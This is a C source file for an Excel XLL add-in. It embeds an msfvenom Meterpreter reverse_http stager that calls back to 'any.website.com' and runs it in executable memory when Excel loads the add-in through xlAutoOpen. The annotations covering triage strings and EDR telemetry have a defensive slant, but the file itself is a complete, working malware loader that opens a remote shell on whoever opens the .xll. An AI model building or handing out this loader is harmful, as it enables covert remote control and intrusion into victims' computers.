c_cpp shellcode_ExcelRegisterXLL.c


// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void); 

// Thread entry point: copies the embedded byte array into newly allocated
// executable memory and transfers control to it.
//
// lpParameter is not read. The return value 1 is reached only if the called
// bytes return to the caller.
//
// NOTE(review): this is a shellcode runner. The comment below attributes the
// bytes to msfvenom's windows/meterpreter/reverse_http stager; nothing in this
// function validates or inspects the buffer before executing it.
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	// For triage: the last two rows of the array contain the NUL-terminated
	// ASCII string "any.website.com" (\x61\x6e\x79\x2e ... \x63\x6f\x6d\x00),
	// matching the LHOST placeholder above, so the callback host is stored
	// unencoded and is visible to a plain strings scan of the built binary.
	// The pushes "\x68\x6e\x65\x74\x00" / "\x68\x77\x69\x6e\x69" spell
	// "wininet" -- presumably the library the stager resolves for HTTP; confirm
	// by disassembly rather than relying on this reading.
	unsigned char b[] = 
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
	"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
	"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
	"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
	"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
	"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
	"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
	"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
	"\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
	"\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
	"\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x6a\x50\xe8\x37\x01"
	"\x00\x00\x2f\x4d\x4c\x71\x4e\x48\x77\x66\x52\x64\x69\x4f\x65"
	"\x57\x70\x39\x62\x78\x79\x32\x53\x4d\x67\x74\x46\x42\x65\x31"
	"\x45\x46\x58\x48\x55\x31\x78\x6b\x31\x4b\x69\x2d\x2d\x4f\x36"
	"\x48\x71\x34\x58\x57\x36\x51\x57\x43\x2d\x6a\x37\x76\x57\x37"
	"\x45\x38\x49\x49\x33\x6b\x64\x31\x4e\x4c\x4f\x76\x69\x67\x52"
	"\x62\x70\x53\x71\x42\x4d\x58\x46\x39\x31\x69\x55\x7a\x73\x48"
	"\x62\x58\x4c\x37\x2d\x6f\x48\x4d\x79\x41\x79\x6d\x71\x36\x71"
	"\x5f\x75\x71\x34\x30\x4c\x4c\x61\x54\x6e\x36\x62\x39\x6e\x4c"
	"\x5f\x59\x70\x50\x50\x69\x2d\x36\x67\x63\x44\x79\x51\x48\x4c"
	"\x62\x76\x44\x5a\x33\x55\x39\x43\x56\x78\x72\x75\x47\x56\x68"
	"\x63\x37\x50\x44\x6e\x4a\x77\x30\x47\x2d\x6c\x52\x70\x68\x39"
	"\x2d\x6e\x39\x50\x4a\x59\x53\x6c\x6e\x5f\x49\x71\x49\x67\x53"
	"\x51\x33\x41\x34\x33\x56\x37\x59\x5a\x69\x73\x57\x6f\x75\x72"
	"\x61\x41\x4b\x6f\x64\x46\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5"
	"\x89\xc6\x53\x68\x00\x02\x60\x84\x53\x53\x53\x57\x53\x56\x68"
	"\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56"
	"\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x08\x4f\x75\xed\xe8"
	"\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40"
	"\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57"
	"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85"
	"\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8"
	"\x8b\xff\xff\xff\x61\x6e\x79\x2e\x77\x65\x62\x73\x69\x74\x65"
	"\x2e\x63\x6f\x6d\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";


	// Requests a private region that is readable, writable and executable at
	// once (PAGE_EXECUTE_READWRITE). The return value is not checked, so a
	// failed allocation passes NULL to memcpy below. A private RWX allocation
	// that is written and then executed is the behaviour memory scanners and
	// EDR allocation/protection telemetry are built to flag.
	void *exec = VirtualAlloc(0, sizeof b, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	// sizeof b includes the trailing NUL the string-literal initializer adds.
	memcpy(exec, b, sizeof b);
	// The data pointer is cast to a function pointer and called: execution
	// continues in memory that is not backed by any image on disk.
	((void(*)())exec)();
	
	return 1;
}

// Exported add-in callback (declared __declspec(dllexport) at the top of the
// file). xlAutoOpen is the entry Excel calls when it loads an XLL add-in, so
// opening the built .xll in Excel is what starts ThreadFunction; nothing else
// in this file calls it.
//
// Detection-relevant behaviour visible here: the work is moved to a new thread
// so the callback returns immediately and Excel stays responsive. Useful
// telemetry is therefore the .xll image load into the Excel process (source
// path, signature state) and subsequent thread creation / network activity
// from that process, not a blocked or crashed Excel.
void __cdecl xlAutoOpen() {
    	HANDLE threadHandle;
	// Create a thread and close the handle, since nothing waits on it.
	// The CreateThread result is not checked; on failure NULL is handed to
	// CloseHandle.
	threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
	CloseHandle(threadHandle);
}

// DLL entry point. Every notification (process/thread attach and detach) is
// ignored and the loader is always told that initialisation succeeded.
//
// Note for analysts: no payload logic runs from here. In this file the
// active code path starts at the exported xlAutoOpen, so reviewing DllMain
// alone shows an inert module.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	// None of the arguments influence the result.
	(void)hModule;
	(void)ul_reason_for_call;
	(void)lpReserved;

	return TRUE;
}
